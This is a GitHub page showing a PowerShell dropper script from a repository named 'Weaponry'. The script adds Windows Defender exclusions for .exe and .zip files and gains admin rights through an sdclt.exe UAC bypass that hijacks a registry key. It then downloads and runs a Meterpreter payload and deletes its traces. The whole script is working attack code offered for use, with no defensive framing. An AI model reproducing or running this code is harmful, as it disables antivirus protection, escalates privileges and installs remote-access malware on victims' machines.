forked from jeffjbowie/Weaponry
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ExclusionDrop.ps1
26 lines (21 loc) · 1.14 KB
/
ExclusionDrop.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Define local filename and URL to Dropper/Implant
$pl_filename = "Reader_sl.exe"
$pl_Uri = "http://127.0.0.1/Meterpreter.exe"
# Write our Defender-disabling command to a file in $ENV:TEMP
$filename = $env:temp + "\" + "CONTOSO.ps1"
New-Item $filename
$cli = 'Add-MpPreference -ExclusionExtension (".exe", ".zip")'
Set-Content $filename $cli
# Leveraging UAC bypass (SDCLT.exe) to run our above script with Admin priveleges.
$cmd = 'powershell.exe -executionpolicy bypass ' + $filename + ''
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value $cmd
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
# Sleep for 15 seconds Allow exceptions to register before downloading Stage 2.
Start-Sleep -s 15
# Download our Meterpreter payload and execute.
Invoke-WebRequest -Uri $pl_Uri -OutFile $env:temp\$pl_filename
Start-Process -FilePath $env:temp\$pl_filename
# Remove our temporary file as well as restore SDCLT functionality.
Remove-Item $filename
Remove-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command"